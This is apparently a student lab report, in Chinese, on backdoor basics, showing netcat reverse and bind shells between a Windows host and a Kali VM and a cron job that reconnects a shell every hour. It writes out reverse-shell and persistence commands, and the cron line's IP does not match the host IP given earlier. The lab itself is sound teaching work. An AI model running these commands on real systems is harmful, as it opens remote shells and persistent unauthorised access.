網路對抗技術Exp2-後門原理與實踐
阿新 • • 發佈:2022-03-02
20191218 Exp2-後門原理與實踐
實驗內容
一、使用netcat獲取主機操作Shell,啟動cron
環境
- 主機:Windows 10;
- 靶機:Kali Linux Debian 10;
實驗步驟
- 在主機上用
ifconfig
檢視Windows10主機IP
主機IP為192.168.1.105
- 在Kali虛擬機器中用
sudo ipconfig
檢視Kali虛擬機器IP
Kali虛擬機器IP為192.168.174.141
- 在主機中使用
ncat -l -p 1218(學號後四位)
監聽本機的1218埠
- 在主機中獲取虛擬機器shell
- 在虛擬機器中使用
nc 192.168.1.105(主機IP) 1218 -e /bin/sh
- 成功getshell
- 在虛擬機器中獲取主機shell
- 在虛擬機器中用
nc -l -p 1218
監聽主機1218埠
- 在主機中用
ncat -e cmd 192.168.174.141 1218
,成功獲取到主機shell
- 在虛擬機器中啟動cron並在主機監聽
-
先在虛擬機器上用
crontab -e
指令編輯一條定時任務(crontab指令增加一條定時任務,-e表示編輯,輸入2表示選擇vim編輯器)
-
在最後一行新增
18 * * * * nc 192.168.211.1 1218 -e /bin/sh
,即在每個小時的第18分鐘反向連線Windows主機的1218埠
-
等到每小時的18分,在ip地址為192.168.1.105的主機端用
ncat -l -p 1218
開啟監聽即可
在主機成功獲取虛擬機器的shell
此外,也可以開一個非反彈式後門,在cron中寫入nc -l -p 1218 -e /bin/sh
,這是攻擊機能隨時通過nc 主機ip 1218
獲得虛擬機器的一個Shell